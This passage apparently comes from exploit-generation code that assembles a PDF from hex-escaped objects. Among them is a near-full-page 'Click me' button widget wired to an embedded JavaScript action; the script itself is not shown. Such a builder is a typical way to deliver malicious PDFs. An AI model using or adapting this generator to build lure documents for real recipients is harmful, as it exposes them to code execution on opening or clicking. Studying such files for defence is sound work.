0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x3c\x3f\x78\x70\x61\x63\x6b\x65\x74\x20\x65\x6e\x64\x3d\x22\x77\x22\x3f\x3e\xd\x65\x6e\x64\x73\x74\x72\x65\x61\x6d\xd") - add_object(32, "\xd\x3c\x3c\x2f\x49\x44\x53\x20\x31\x37\x20\x30\x20\x52\x2f\x55\x52\x4c\x53\x20\x31\x38\x20\x30\x20\x52\x3e\x3e\xd") - add_object(7, "\xd\x3c\x3c\x2f\x43\x6f\x75\x6e\x74\x20\x32\x2f\x46\x69\x72\x73\x74\x20\x38\x20\x30\x20\x52\x2f\x4c\x61\x73\x74\x20\x38\x20\x30\x20\x52\x2f\x54\x79\x70\x65\x2f\x4f\x75\x74\x6c\x69\x6e\x65\x73\x3e\x3e\xd") - add_object(16, "\xd\x3c\x3c\x2f\x43\x6f\x75\x6e\x74\x20\x31\x2f\x4b\x69\x64\x73\x5b\x32\x36\x20\x30\x20\x52\x5d\x2f\x54\x79\x70\x65\x2f\x50\x61\x67\x65\x73\x3e\x3e\xd") - add_object(22, 
"\xd\x3c\x3c\x2f\x56\x20\x31\x2e\x32\x35\x3e\x3e\xd") - add_object(10, "\xd\x3c\x3c\x2f\x43\x6c\x61\x73\x73\x4d\x61\x70\x20\x31\x31\x20\x30\x20\x52\x2f\x4b\x20\x31\x32\x20\x30\x20\x52\x2f\x50\x61\x72\x65\x6e\x74\x54\x72\x65\x65\x20\x31\x33\x20\x30\x20\x52\x2f\x50\x61\x72\x65\x6e\x74\x54\x72\x65\x65\x4e\x65\x78\x74\x4b\x65\x79\x20\x31\x2f\x54\x79\x70\x65\x2f\x53\x74\x72\x75\x63\x74\x54\x72\x65\x65\x52\x6f\x6f\x74\x3e\x3e\xd") - add_object(11, "\xd\x3c\x3c\x2f\x53\x70\x64\x72\x41\x72\x74\x3c\x3c\x2f\x4f\x2f\x57\x65\x62\x43\x61\x70\x74\x75\x72\x65\x3e\x3e\x3e\x3e\xd") - add_object(12, "\xd\x3c\x3c\x2f\x4b\x20\x31\x35\x20\x30\x20\x52\x2f\x50\x20\x31\x30\x20\x30\x20\x52\x2f\x53\x2f\x44\x6f\x63\x75\x6d\x65\x6e\x74\x3e\x3e\xd") - add_object(13, "\xd\x3c\x3c\x2f\x4e\x75\x6d\x73\x5b\x30\x20\x31\x34\x20\x30\x20\x52\x5d\x3e\x3e\xd") - add_object(14, "\xd\x5b\x31\x35\x20\x30\x20\x52\x20\x31\x35\x20\x30\x20\x52\x5d\xd") - add_object(15, "\xd\x3c\x3c\x2f\x43\x2f\x53\x70\x64\x72\x41\x72\x74\x2f\x4b\x5b\x30\x20\x31\x5d\x2f\x50\x20\x31\x32\x20\x30\x20\x52\x2f\x50\x67\x20\x32\x36\x20\x30\x20\x52\x2f\x53\x2f\x41\x72\x74\x69\x63\x6c\x65\x3e\x3e\xd") - add_object(26, 
"\xd\x3c\x3c\x2f\x41\x6e\x6e\x6f\x74\x73\x20\x34\x31\x20\x30\x20\x52\x2f\x43\x6f\x6e\x74\x65\x6e\x74\x73\x20\x35\x34\x20\x30\x20\x52\x2f\x43\x72\x6f\x70\x42\x6f\x78\x5b\x30\x2e\x30\x20\x30\x2e\x30\x20\x36\x31\x32\x2e\x30\x20\x37\x39\x32\x2e\x30\x5d\x2f\x47\x72\x6f\x75\x70\x20\x33\x34\x20\x30\x20\x52\x2f\x49\x44\x20\x33\x35\x20\x30\x20\x52\x2f\x4d\x65\x64\x69\x61\x42\x6f\x78\x5b\x30\x2e\x30\x20\x30\x2e\x30\x20\x36\x31\x32\x2e\x30\x20\x37\x39\x32\x2e\x30\x5d\x2f\x50\x5a\x20\x31\x2e\x30\x2f\x50\x61\x72\x65\x6e\x74\x20\x31\x36\x20\x30\x20\x52\x2f\x52\x65\x73\x6f\x75\x72\x63\x65\x73\x3c\x3c\x2f\x43\x6f\x6c\x6f\x72\x53\x70\x61\x63\x65\x3c\x3c\x2f\x43\x53\x30\x20\x33\x33\x20\x30\x20\x52\x3e\x3e\x3e\x3e\x2f\x52\x6f\x74\x61\x74\x65\x20\x30\x2f\x53\x74\x72\x75\x63\x74\x50\x61\x72\x65\x6e\x74\x73\x20\x30\x2f\x54\x79\x70\x65\x2f\x50\x61\x67\x65\x3e\x3e\xd") - add_object(41, "\xd\x5b\x33\x38\x20\x30\x20\x52\x5d\xd") - add_object(54, "\xd\x3c\x3c\x2f\x46\x69\x6c\x74\x65\x72\x2f\x46\x6c\x61\x74\x65\x44\x65\x63\x6f\x64\x65\x2f\x4c\x65\x6e\x67\x74\x68\x20\x31\x35\x34\x3e\x3e\x73\x74\x72\x65\x61\x6d\xd\x48\x89\x5c\x4e\xc1\xd\xc2\x30\x14\xbb\xf7\x2b\xf2\x5\xbe\x56\xad\x63\x30\x6\xeb\xa6\xe0\x61\x20\xcc\xdb\xf0\x50\x6b\xa7\x3\x5d\x65\x7b\x82\xfe\xbd\x9b\xb7\x79\x48\x42\x12\x8\xa1\xac\xe7\xb6\xb1\x8e\x91\x24\x94\x31\x5b\x77\xf3\x17\xd4\x64\x2\x73\x78\xe0\x44\xc6\x84\x37\x6a\xd\xd\x25\x47\xac\xc7\xa8\x7a\x9d\xf9\xf3\xf4\xa0\x5d\x8\xec\x7b\xd0\xf1\xe7\xe\xf6\xda\x76\x96\xdb\xd0\x21\x4d\x4d\x91\x43\x6c\xcb\x91\x28\xaf\x24\xdc\x0\x5\xc\xae\x13\x4a\x62\xb5\x81\x8e\xd5\x22\xd2\x88\x96\xf1\x24\xbd\x17\x8d\xa0\xe9\x89\xbb\xfb\xe9\x48\x99\xef\xb\xc8\xf9\xcc\x7f\xad\x66\xf5\x57\x80\x1\x0\xcb\xa4\x36\x2c\xd\x65\x6e\x64\x73\x74\x72\x65\x61\x6d\xd") - add_object(34, "\xd\x3c\x3c\x2f\x43\x53\x20\x33\x36\x20\x30\x20\x52\x2f\x53\x2f\x54\x72\x61\x6e\x73\x70\x61\x72\x65\x6e\x63\x79\x3e\x3e\xd") - add_object(35, "\xd\x28\x1a\xca\x20\x4e\x2a\x5\x7b\x3\x0\xdd\xff\x1e\x62\x76\x26\xb3\x29\xd") - 
add_object(33, "\xd\x5b\x2f\x49\x43\x43\x42\x61\x73\x65\x64\x20\x32\x39\x20\x30\x20\x52\x5d\xd") - add_object(29, "\xd\x3c\x3c\x2f\x46\x69\x6c\x74\x65\x72\x2f\x46\x6c\x61\x74\x65\x44\x65\x63\x6f\x64\x65\x2f\x4c\x65\x6e\x67\x74\x68\x20\x32\x31\x36\x2f\x4e\x20\x31\x3e\x3e\x73\x74\x72\x65\x61\x6d\xd\x48\x89\x62\x60\x60\x9c\xe1\xe8\xe2\xe4\xca\x24\xc0\xc0\x90\x9b\x57\x52\xe4\x1e\xe4\x18\x19\x11\x19\xa5\xc0\x7e\x9e\x81\x8d\x81\x99\x1\xc\x12\x93\x8b\xb\x1c\x3\x2\x7c\x40\xec\xbc\xfc\xbc\x54\x6\xc\xf0\xed\x1a\x3\x23\x88\xbe\xac\xb\x32\xb\x53\x1e\x2f\x60\x4d\x2e\x28\x2a\x1\xd2\x7\x80\xd8\x28\x25\xb5\x38\x19\x48\x7f\x1\xe2\xcc\xf2\x92\x2\xa0\x38\x63\x2\x90\x2d\x92\x94\xd\x66\x83\xd4\x89\x64\x87\x4\x39\x3\xd9\x1d\x40\x36\x5f\x49\x6a\x5\x48\x8c\xc1\x39\xbf\xa0\xb2\x28\x33\x3d\xa3\x44\xc1\xd0\xd2\xd2\x52\xc1\x31\x25\x3f\x29\x55\x21\xb8\xb2\xb8\x24\x35\xb7\x58\xc1\x33\x2f\x39\xbf\xa8\x20\xbf\x28\xb1\x24\x35\x5\xa8\x16\x6a\x7\x8\xf0\xbb\x17\x25\x56\x2a\xb8\x27\xe6\xe6\x26\x2a\x18\xe9\x19\x91\xe8\x72\x22\x0\x28\x2c\x21\xac\xcf\x21\xe0\x30\x62\x14\x3b\x8f\x10\x43\x80\xe4\xd2\xa2\x32\x28\x93\x91\xc9\x98\x81\x1\x20\xc0\x0\x49\xc6\x38\x2f\xd\x65\x6e\x64\x73\x74\x72\x65\x61\x6d\xd") - add_object(36, "\xd\x5b\x2f\x49\x43\x43\x42\x61\x73\x65\x64\x20\x33\x30\x20\x30\x20\x52\x5d\xd") - add_object(30, 
"\xd\x3c\x3c\x2f\x41\x6c\x74\x65\x72\x6e\x61\x74\x65\x2f\x44\x65\x76\x69\x63\x65\x52\x47\x42\x2f\x46\x69\x6c\x74\x65\x72\x2f\x46\x6c\x61\x74\x65\x44\x65\x63\x6f\x64\x65\x2f\x4c\x65\x6e\x67\x74\x68\x20\x32\x35\x37\x34\x2f\x4e\x20\x33\x3e\x3e\x73\x74\x72\x65\x61\x6d\xd\x48\x89\x9c\x96\x79\x54\x53\x77\x16\xc7\x7f\x6f\xc9\x9e\x90\x95\xb0\xc3\x63\xd\x5b\x80\xb0\x6\x90\x35\x6c\x61\x91\x1d\x4\x51\x8\x49\x8\x1\x12\x42\x48\xd8\x5\x41\x44\x5\x14\x45\x44\x84\xaa\x95\x32\xd6\x6d\x74\x46\x4f\x45\x9d\x2e\xae\x63\xad\xe\xd6\x7d\xea\xd2\x3\xf5\x30\xea\xe8\x38\xb4\x16\xd7\x8e\x9d\x17\x38\x47\x9d\x4e\x67\xa6\xd3\xef\x1f\xef\xf7\x39\xf7\x77\xef\xef\xdd\xdf\xbd\xf7\x9d\xf3\x0\xa0\x27\xa5\xaa\xb5\xd5\x30\xb\x0\x8d\xd6\xa0\xcf\x4a\x8c\xc5\x16\x15\x14\x62\xa4\x9\x0\x3\xd\x20\x2\x11\x0\x32\x79\xad\x2e\x2d\x3b\x21\x7\xe0\x92\xc6\x4b\xb0\x5a\xdc\x9\xfc\x8b\x9e\x5e\x7\x90\x69\xbd\x22\x4c\xca\xc0\x30\xf0\xff\x89\x2d\xd7\xe9\xd\x0\x40\x19\x38\x7\x28\x94\xb5\x72\x9c\x3b\x71\xae\xaa\x37\xe8\x4c\xf6\x19\x9c\x79\xa5\x95\x26\x86\x51\x13\xeb\xf1\x4\x71\xb6\x34\xb1\x6a\x9e\xbd\xe7\x7c\xe6\x39\xda\xc4\xd\x8d\x56\x81\xb3\x29\x67\x9d\x42\xa3\x30\xf1\x69\x9c\x57\xd7\x19\x95\x38\x23\xa9\x38\x77\xd5\xa9\x95\xf5\x38\x5f\xc5\xd9\xa5\xca\xa8\x51\xe3\xfc\xdc\x14\xab\x51\xca\x6a\x1\x40\xe9\x26\xbb\x41\x29\x2f\xc7\xd9\xf\x67\xba\x3e\x27\x4b\x82\xf3\x2\x0\xc8\x74\xd5\x3b\x5c\xfa\xe\x1b\x94\xd\x6\xd3\xa5\x24\xd5\xba\x46\xbd\x5a\x55\x6e\xc0\xdc\xe5\x1e\x98\x28\x34\x54\x8c\x25\x29\xeb\xab\x94\x6\x83\x30\x43\x26\xaf\x94\xe9\x15\x98\xa4\x5a\xa3\x93\x69\x1b\x1\x98\xbf\xf3\x9c\x38\xa6\xda\x62\x78\x91\x83\x45\xa1\xc1\xc1\x42\x7f\x1f\xd1\x3b\x85\xfa\xaf\x9b\xbf\x50\xa6\xde\xce\xd3\x93\xcc\xb9\x9e\x41\xfc\xb\x6f\x6d\x3f\xe7\x57\x3d\xd\x80\x78\x16\xaf\xcd\xfa\xb7\xb6\xd2\x2d\x0\x8c\xaf\x4\xc0\xf2\xe6\x5b\x9b\xcb\xfb\x0\x30\xf1\xbe\x1d\xbe\xf8\xce\x7d\xf8\xa6\x79\x29\x37\x18\x74\x61\xbe\xbe\xf5\xf5\xf5\x3e\x6a\xa5\xdc\xc7\x54\xd0\x37\xfa\x9f\xe\xbf\x40\xef\xbc\xcf\xc7\x74\xdc\x9b\xf2\x60\x71\xca\x32\x99\xb1\xca\x80\x99\xea\x2
6\xaf\xae\xaa\x36\xea\xb1\x5a\x9d\x4c\xae\xc4\x84\x3f\x1d\xe2\x5f\x1d\xf8\xf3\x79\x78\x67\x29\xcb\x94\x7a\xa5\x16\x8f\xc8\xc3\xa7\x4c\xad\x55\xe1\xed\xd6\x2a\xd4\x6\x75\xb5\x16\x53\x6b\xff\x53\x13\x7f\x65\xd8\x4f\x34\x3f\xd7\xb8\xb8\x63\xaf\x1\xaf\xd8\x7\xb0\x2e\xf2\x0\xf2\xb7\xb\x0\xe5\xd2\x0\x52\xb4\xd\xdf\x81\xde\xf4\x2d\x95\x92\x7\x32\xf0\x35\xdf\xe1\xde\xfc\xdc\xcf\x9\xfa\xf7\x53\xe1\x3e\xd3\xa3\x56\xad\x9a\x8b\x93\x64\xe5\x60\x72\xa3\xbe\x6e\x7e\xcf\xf4\x59\x2\x2\xa0\x2\x26\xe0\x1\x2b\x60\xf\x9c\x81\x3b\x10\x2\x7f\x10\x2\xc2\x41\x34\x88\x7\xc9\x20\x1d\xe4\x80\x2\xb0\x14\xc8\x41\x39\xd0\x0\x3d\xa8\x7\x2d\xa0\x1d\x74\x81\x1e\xb0\x1e\x6c\x2\xc3\x60\x3b\x18\x3\xbb\xc1\x7e\x70\x10\x8c\x83\x8f\xc1\x9\xf0\x47\x70\x1e\x7c\x9\xae\x81\x5b\x60\x12\x4c\x83\x87\x60\x6\x3c\x5\xaf\x20\x8\x22\x41\xc\x88\xb\x59\x41\xe\x90\x2b\xe4\x5\xf9\x43\x62\x28\x12\x8a\x87\x52\xa1\x2c\xa8\x0\x2a\x81\x54\x90\x16\x32\x42\x2d\xd0\xd\xa8\x7\xea\x87\x86\xa1\x1d\xd0\x6e\xe8\xf7\xd0\x51\xe8\x4\x74\xe\xba\x4\x7d\x5\x4d\x41\xf\xa0\xef\xa0\x97\x30\x2\xd3\x61\x1e\x6c\x7\xbb\xc1\xbe\xb0\x18\x8e\x81\x53\xe0\x1c\x78\x9\xac\x82\x6b\xe0\x26\xb8\x13\x5e\x7\xf\xc1\xa3\xf0\x3e\xf8\x30\x7c\x2\x3e\xf\x5f\x83\x27\xe1\x87\xf0\x2c\x2\x10\x1a\xc2\x47\x1c\x11\x21\x22\x46\x24\x48\x3a\x52\x88\x94\x21\x7a\xa4\x15\xe9\x46\x6\x91\x51\x64\x3f\x72\xc\x39\x8b\x5c\x41\x26\x91\x47\xc8\xb\x94\x88\x72\x51\xc\x15\xa2\xe1\x68\x12\x9a\x8b\xca\xd1\x1a\xb4\x15\xed\x45\x87\xd1\x5d\xe8\x61\xf4\x34\x7a\x5\x9d\x42\x67\xd0\xd7\x4\x6\xc1\x96\xe0\x45\x8\x23\x48\x9\x8b\x8\x2a\x42\x3d\xa1\x8b\x30\x48\xd8\x49\xf8\x88\x70\x86\x70\x8d\x30\x4d\x78\x4a\x24\x12\xf9\x44\x1\x31\x84\x98\x44\x2c\x20\x56\x10\x9b\x89\xbd\xc4\xad\xc4\x3\xc4\xe3\xc4\x4b\xc4\xbb\xc4\x59\x12\x89\x64\x45\xf2\x22\x45\x90\xd2\x49\x32\x92\x81\xd4\x45\xda\x42\xda\x47\xfa\x8c\x74\x99\x34\x4d\x7a\x4e\xa6\x91\x1d\xc8\xfe\xe4\x4\x72\x21\x59\x4b\xee\x20\xf\x92\xf7\x90\x3f\x25\x5f\x26\xdf\x23\xbf\xa2\xb0\x28\xae\x94\x30\x4a\x3a\x45\x41\x69\xa4\xf4\x51\xc6\x28\xc7\x28\x17\x29\xd3\x94\
x57\x54\x36\x55\x40\x8d\xa0\xe6\x50\x2b\xa8\xed\xd4\x21\xea\x7e\xea\x19\xea\x6d\xea\x13\x1a\x8d\xe6\x44\xb\xa5\x65\xd2\xd4\xb4\xe5\xb4\x21\xda\xef\x68\x9f\xd3\xa6\x68\x2f\xe8\x1c\xba\x27\x5d\x42\x2f\xa2\x1b\xe9\xeb\xe8\x1f\xd2\x8f\xd3\xbf\xa2\x3f\x61\x30\x18\x6e\x8c\x68\x46\x21\xc3\xc0\x58\xc7\xd8\xcd\x38\xc5\xf8\x9a\xf1\xdc\x8c\x6b\xe6\x63\x26\x35\x53\x98\xb5\x99\x8d\x98\x1d\x36\xbb\x6c\xf6\x98\x49\x61\xba\x32\x63\x98\x4b\x99\x4d\xcc\x41\xe6\x21\xe6\x45\xe6\x23\x16\x85\xe5\xc6\x92\xb0\x64\xac\x56\xd6\x8\xeb\x28\xeb\x6\x6b\x96\xcd\x65\x8b\xd8\xe9\x6c\xd\xbb\x97\xbd\x87\x7d\x8e\x7d\x9f\x43\xe2\xb8\x71\xe2\x39\xd\x4e\x27\xe7\x3\xce\x29\xce\x5d\x2e\xc2\x75\xe6\x4a\xb8\x72\xee\xd\xee\x18\xf7\xc\x77\x9a\x47\xe4\x9\x78\x52\x5e\x5\xaf\x87\xf7\x5b\xde\x4\x6f\xc6\x9c\x63\x1e\x68\x9e\x67\xde\x60\x3e\x62\xfe\x89\xf9\x24\x1f\xe1\xbb\xf1\xa5\xfc\x2a\x7e\x1f\xff\x20\xff\x3a\xff\xa5\x85\x9d\x45\x8c\x85\xd2\x62\x8d\xc5\x7e\x8b\xcb\x16\xcf\x2c\x6d\x2c\xa3\x2d\x95\x96\xdd\x96\x7\x2c\xaf\x59\xbe\xb4\xc2\xac\xe2\xad\x2a\xad\x36\x58\x8d\x5b\xdd\xb1\x46\xad\x3d\xad\x33\xad\xeb\xad\xb7\x59\x9f\xb1\x7e\x64\xc3\xb3\x9\xb7\x91\xdb\x74\xdb\x1c\xb4\xb9\x69\xb\xdb\x7a\xda\x66\xd9\x36\xdb\x7e\x60\x7b\xc1\x76\xd6\xce\xde\x2e\xd1\x4e\x67\xb7\xc5\xee\x94\xdd\x23\x7b\xbe\x7d\xb4\x7d\x85\xfd\x80\xfd\xa7\xf6\xf\x1c\xb8\xe\x91\xe\x6a\x87\x1\x87\xcf\x1c\xfe\x8a\x99\x63\x31\x58\x15\x36\x84\x9d\xc6\x66\x1c\x6d\x1d\x93\x1c\x8d\x8e\x3b\x1c\x27\x1c\x5f\x39\x9\x9c\x72\x9d\x3a\x9c\xe\x38\xdd\x71\xa6\x3a\x8b\x9d\xcb\x9c\x7\x9c\x4f\x3a\xcf\xb8\x38\xb8\xa4\xb9\xb4\xb8\xec\x75\xb9\xe9\x4a\x71\x15\xbb\x96\xbb\x6e\x76\x3d\xeb\xfa\xcc\x4d\xe0\x96\xef\xb6\xca\x6d\xdc\xed\xbe\xc0\x52\x20\x15\x34\x9\xf6\xd\x6e\xbb\x33\xdc\xa3\xdc\x6b\xdc\x47\xdd\xaf\x7a\x10\x3d\xc4\x1e\x95\x1e\x5b\x3d\xbe\xf4\x84\x3d\x83\x3c\xcb\x3d\x47\x3c\x2f\x7a\xc1\x5e\xc1\x5e\x6a\xaf\xad\x5e\x97\xbc\x9\xde\xa1\xde\x5a\xef\x51\xef\x1b\x42\xba\x30\x46\x58\x27\xdc\x2b\x9c\xf2\xe1\xfb\xa4\xfa\x74\xf8\x8c\xfb\x3c\xf6\x75\xf1\x2d\xf4\xdd\xe0\x7b\xd6\xf7\
xb5\x5f\x90\x5f\x95\xdf\x98\xdf\x2d\x11\x47\x94\x2c\xea\x10\x1d\x13\x7d\xe7\xef\xe9\x2f\xf7\x1f\xf1\xbf\x1a\xc0\x8\x48\x8\x68\xb\x38\x12\xf0\x6d\xa0\x57\xa0\x32\x70\x5b\xe0\x9f\x83\xb8\x41\x69\x41\xab\x82\x4e\x6\xfd\x23\x38\x24\x58\x1f\xbc\x3f\xf8\x41\x88\x4b\x48\x49\xc8\x7b\x21\x37\xc4\x3c\x71\x86\xb8\x57\xfc\x79\x28\x21\x34\x36\xb4\x2d\xf4\xe3\xd0\x17\x61\xc1\x61\x86\xb0\x83\x61\x7f\xf\x17\x86\x57\x86\xef\x9\xbf\xbf\x40\xb0\x40\xb9\x60\x6c\xc1\xdd\x8\xa7\x8\x59\xc4\x8e\x88\xc9\x48\x2c\xb2\x24\xf2\xfd\xc8\xc9\x28\xc7\x28\x59\xd4\x68\xd4\x37\xd1\xce\xd1\x8a\xe8\x9d\xd1\xf7\x62\x3c\x62\x2a\x62\xf6\xc5\x3c\x8e\xf5\x8b\xd5\xc7\x7e\x14\xfb\x4c\x12\x26\x59\x26\x39\x1e\x87\xc4\x25\xc6\x75\xc7\x4d\xc4\x73\xe2\x73\xe3\x87\xe3\xbf\x4e\x70\x4a\x50\x25\xec\x4d\x98\x49\xc\x4a\x6c\x4e\x3c\x9e\x44\x48\x4a\x49\xda\x90\x74\x43\x6a\x27\x95\x4b\x77\x4b\x67\x92\x43\x92\x97\x25\x9f\x4e\xa1\xa7\x64\xa7\xc\xa7\x7c\x93\xea\x99\xaa\x4f\x3d\x96\x6\xa7\x25\xa7\x6d\x4c\xbb\xbd\xd0\x75\xa1\x76\xe1\x78\x3a\x48\x97\xa6\x6f\x4c\xbf\x93\x21\xc8\xa8\xc9\xf8\x43\x26\x31\x33\x23\x73\x24\xf3\x2f\x59\xa2\xac\x96\xac\xb3\xd9\xdc\xec\xe2\xec\x3d\xd9\x4f\x73\x62\x73\xfa\x72\x6e\xe5\xba\xe7\x1a\x73\x4f\xe6\x31\xf3\x8a\xf2\x76\xe7\x3d\xcb\x8f\xcb\xef\xcf\x9f\x5c\xe4\xbb\x68\xd9\xa2\xf3\x5\xd6\x5\xea\x82\x23\x85\xa4\xc2\xbc\xc2\x9d\x85\xb3\x8b\xe3\x17\x6f\x5a\x3c\x5d\x14\x54\xd4\x55\x74\x7d\x89\x60\x49\xc3\x92\x73\x4b\xad\x97\x56\x2d\xfd\xa4\x98\x59\x2c\x2b\x3e\x54\x42\x28\xc9\x2f\xd9\x53\xf2\x83\x2c\x5d\x36\x2a\x9b\x2d\x95\x96\xbe\x57\x3a\x23\x97\xc8\x37\xcb\x1f\x2a\xa2\x15\x3\x8a\x7\xca\x8\x65\xbf\xf2\x5e\x59\x44\x59\x7f\xd9\x7d\x55\x84\x6a\xa3\xea\x41\x79\x54\xf9\x60\xf9\x23\xb5\x44\x3d\xac\xfe\xb6\x22\xa9\x62\x7b\xc5\xb3\xca\xf4\xca\xf\x2b\x7f\xac\xca\xaf\x3a\xa0\x21\x6b\x4a\x34\x47\xb5\x1c\x6d\xa5\xf6\x74\xb5\x7d\x75\x43\xf5\x25\x9d\x97\xae\x4b\x37\x59\x13\x56\xb3\xa9\x66\x46\x9f\xa2\xdf\x59\xb\xd5\x2e\xa9\x3d\x62\xe0\xe1\x3f\x53\x17\x8c\xee\xc6\x95\xc6\xa9\xba\xc8\xba\x91\xba\xe7\xf5\x79\xf5\x87\x1a\xd
8\xd\xda\x86\xb\x8d\x9e\x8d\x6b\x1a\xef\x35\x25\x34\xfd\xa6\x19\x6d\x96\x37\x9f\x6c\x71\x6c\x69\x6f\x99\x5a\x16\xb3\x6c\x47\x2b\xd4\x5a\xda\x7a\xb2\xcd\xb9\xad\xb3\x6d\x7a\x79\xe2\xf2\x5d\xed\xd4\xf6\xca\xf6\x3f\x75\xf8\x75\xf4\x77\x7c\xbf\x22\x7f\xc5\xb1\x4e\xbb\xce\xe5\x9d\x77\x57\x26\xae\xdc\xdb\x65\xd6\xa5\xef\xba\xb1\x2a\x7c\xd5\xf6\xd5\xe8\x6a\xf5\xea\x89\x35\x1\x6b\xb6\xac\x79\xdd\xad\xe8\xfe\xa2\xc7\xaf\x67\xb0\xe7\x87\x5e\x79\xef\x17\x6b\x45\x6b\x87\xd6\xfe\xb8\xae\x6c\xdd\x44\x5f\x70\xdf\xb6\xf5\xc4\xf5\xda\xf5\xd7\x37\x44\x6d\xd8\xd5\xcf\xee\x6f\xea\xbf\xbb\x31\x6d\xe3\xe1\x1\x6c\xa0\x7b\xe0\xfb\x4d\xc5\x9b\xce\xd\x6\xe\x6e\xdf\x4c\xdd\x6c\xdc\x3c\x39\x94\xfa\x4f\x0\xa4\x1\x5b\xfe\x98\xb8\x99\x24\x99\x90\x99\xfc\x9a\x68\x9a\xd5\x9b\x42\x9b\xaf\x9c\x1c\x9c\x89\x9c\xf7\x9d\x64\x9d\xd2\x9e\x40\x9e\xae\x9f\x1d\x9f\x8b\x9f\xfa\xa0\x69\xa0\xd8\xa1\x47\xa1\xb6\xa2\x26\xa2\x96\xa3\x6\xa3\x76\xa3\xe6\xa4\x56\xa4\xc7\xa5\x38\xa5\xa9\xa6\x1a\xa6\x8b\xa6\xfd\xa7\x6e\xa7\xe0\xa8\x52\xa8\xc4\xa9\x37\xa9\xa9\xaa\x1c\xaa\x8f\xab\x2\xab\x75\xab\xe9\xac\x5c\xac\xd0\xad\x44\xad\xb8\xae\x2d\xae\xa1\xaf\x16\xaf\x8b\xb0\x0\xb0\x75\xb0\xea\xb1\x60\xb1\xd6\xb2\x4b\xb2\xc2\xb3\x38\xb3\xae\xb4\x25\xb4\x9c\xb5\x13\xb5\x8a\xb6\x1\xb6\x79\xb6\xf0\xb7\x68\xb7\xe0\xb8\x59\xb8\xd1\xb9\x4a\xb9\xc2\xba\x3b\xba\xb5\xbb\x2e\xbb\xa7\xbc\x21\xbc\x9b\xbd\x15\xbd\x8f\xbe\xd\xbe\x84\xbe\xff\xbf\x7a\xbf\xf5\xc0\x70\xc0\xec\xc1\x67\xc1\xe3\xc2\x5f\xc2\xdb\xc3\x58\xc3\xd4\xc4\x51\xc4\xce\xc5\x4b\xc5\xc8\xc6\x46\xc6\xc3\xc7\x41\xc7\xbf\xc8\x3d\xc8\xbc\xc9\x3a\xc9\xb9\xca\x38\xca\xb7\xcb\x36\xcb\xb6\xcc\x35\xcc\xb5\xcd\x35\xcd\xb5\xce\x36\xce\xb6\xcf\x37\xcf\xb8\xd0\x39\xd0\xba\xd1\x3c\xd1\xbe\xd2\x3f\xd2\xc1\xd3\x44\xd3\xc6\xd4\x49\xd4\xcb\xd5\x4e\xd5\xd1\xd6\x55\xd6\xd8\xd7\x5c\xd7\xe0\xd8\x64\xd8\xe8\xd9\x6c\xd9\xf1\xda\x76\xda\xfb\xdb\x80\xdc\x5\xdc\x8a\xdd\x10\xdd\x96\xde\x1c\xde\xa2\xdf\x29\xdf\xaf\xe0\x36\xe0\xbd\xe1\x44\xe1\xcc\xe2\x53\xe2\xdb\xe3\x63\xe3\xeb\xe4\x73\xe4\xfc\xe5\x84\xe6\xd\xe
6\x96\xe7\x1f\xe7\xa9\xe8\x32\xe8\xbc\xe9\x46\xe9\xd0\xea\x5b\xea\xe5\xeb\x70\xeb\xfb\xec\x86\xed\x11\xed\x9c\xee\x28\xee\xb4\xef\x40\xef\xcc\xf0\x58\xf0\xe5\xf1\x72\xf1\xff\xf2\x8c\xf3\x19\xf3\xa7\xf4\x34\xf4\xc2\xf5\x50\xf5\xde\xf6\x6d\xf6\xfb\xf7\x8a\xf8\x19\xf8\xa8\xf9\x38\xf9\xc7\xfa\x57\xfa\xe7\xfb\x77\xfc\x7\xfc\x98\xfd\x29\xfd\xba\xfe\x4b\xfe\xdc\xff\x6d\xff\xff\x2\xc\x0\xf7\x84\xf3\xfb\xd\x65\x6e\x64\x73\x74\x72\x65\x61\x6d\xd") - add_object(38, "\xd\x3c\x3c\x2f\x41\x20\x34\x33\x20\x30\x20\x52\x2f\x41\x50\x3c\x3c\x2f\x4e\x20\x35\x31\x20\x30\x20\x52\x3e\x3e\x2f\x44\x41\x28\x2f\x48\x65\x42\x6f\x20\x31\x32\x20\x54\x66\x20\x30\x20\x67\x29\x2f\x46\x20\x34\x2f\x46\x54\x2f\x42\x74\x6e\x2f\x46\x66\x20\x36\x35\x35\x33\x36\x2f\x4d\x4b\x3c\x3c\x2f\x42\x47\x5b\x31\x2e\x30\x20\x31\x2e\x30\x20\x31\x2e\x30\x5d\x2f\x43\x41\x28\x43\x6c\x69\x63\x6b\x20\x6d\x65\x29\x2f\x54\x50\x20\x31\x3e\x3e\x2f\x50\x20\x32\x36\x20\x30\x20\x52\x2f\x52\x65\x63\x74\x5b\x30\x2e\x30\x20\x30\x2e\x36\x31\x34\x38\x36\x38\x20\x36\x31\x31\x2e\x33\x38\x34\x20\x37\x39\x32\x2e\x30\x5d\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x57\x69\x64\x67\x65\x74\x2f\x54\x28\x62\x74\x6e\x43\x6c\x69\x63\x6b\x4d\x65\x29\x2f\x54\x55\x28\x43\x6c\x69\x63\x6b\x20\x6d\x65\x29\x2f\x54\x79\x70\x65\x2f\x41\x6e\x6e\x6f\x74\x3e\x3e\xd") - add_object(43, "\xd\x3c\x3c\x2f\x4a\x53\x20\x34\x36\x20\x30\x20\x52\x2f\x53\x2f\x4a\x61\x76\x61\x53\x63\x72\x69\x70\x74\x3e\x3e\xd") - add_object(51, 
"\xd\x3c\x3c\x2f\x42\x42\x6f\x78\x5b\x30\x2e\x30\x20\x30\x2e\x30\x20\x36\x31\x31\x2e\x33\x38\x34\x20\x37\x39\x31\x2e\x33\x38\x35\x5d\x2f\x46\x6f\x72\x6d\x54\x79\x70\x65\x20\x31\x2f\x4c\x65\x6e\x67\x74\x68\x20\x36\x34\x2f\x4d\x61\x74\x72\x69\x78\x5b\x31\x2e\x30\x20\x30\x2e\x30\x20\x30\x2e\x30\x20\x31\x2e\x30\x20\x30\x2e\x30\x20\x30\x2e\x30\x5d\x2f\x52\x65\x73\x6f\x75\x72\x63\x65\x73\x3c\x3c\x2f\x50\x72\x6f\x63\x53\x65\x74\x5b\x2f\x50\x44\x46\x5d\x3e\x3e\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x46\x6f\x72\x6d\x2f\x54\x79\x70\x65\x2f\x58\x4f\x62\x6a\x65\x63\x74\x3e\x3e\x73\x74\x72\x65\x61\x6d\xd\x31\x20\x67\xd\x30\x20\x30\x20\x36\